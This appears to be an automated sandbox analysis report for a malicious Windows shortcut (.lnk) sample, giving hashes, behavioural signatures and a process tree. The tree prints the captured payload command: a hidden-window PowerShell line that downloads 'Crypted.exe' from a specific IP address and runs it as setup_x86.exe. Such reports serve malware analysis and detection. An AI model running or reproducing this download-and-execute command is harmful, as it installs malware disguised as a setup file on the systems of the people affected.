Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
16-10-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk
Resource
win10v2004-20241007-en
General
-
Target
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk
-
Size
1KB
-
MD5
24b35581ca3b4d40271e57c85e296acb
-
SHA1
06772cefa2064960b2db126373dc65cb39aca466
-
SHA256
9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414
-
SHA512
4d828fe1d9bed99f9616f84cce7893ea69923f07dd75a3da8e1e5b2bb840ddaa642aa8187721d0a198c1700413df4c79387419c7376a8d704e7bfb644d18c1da
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2864 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3060 wrote to memory of 2864 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 2864 3060 cmd.exe powershell.exe PID 3060 wrote to memory of 2864 3060 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\9b2a9d2d3db782a88b2db346864bb53ab0e08b02463555f9cd394327d1d41414.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://217.160.121.141:8030/5643254657/Crypted.exe -OutFile $ENV:USERPROFILE\Downloads\setup_x86.exe; Start-Process $ENV:USERPROFILE\Downloads\setup_x86.exe }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2864
-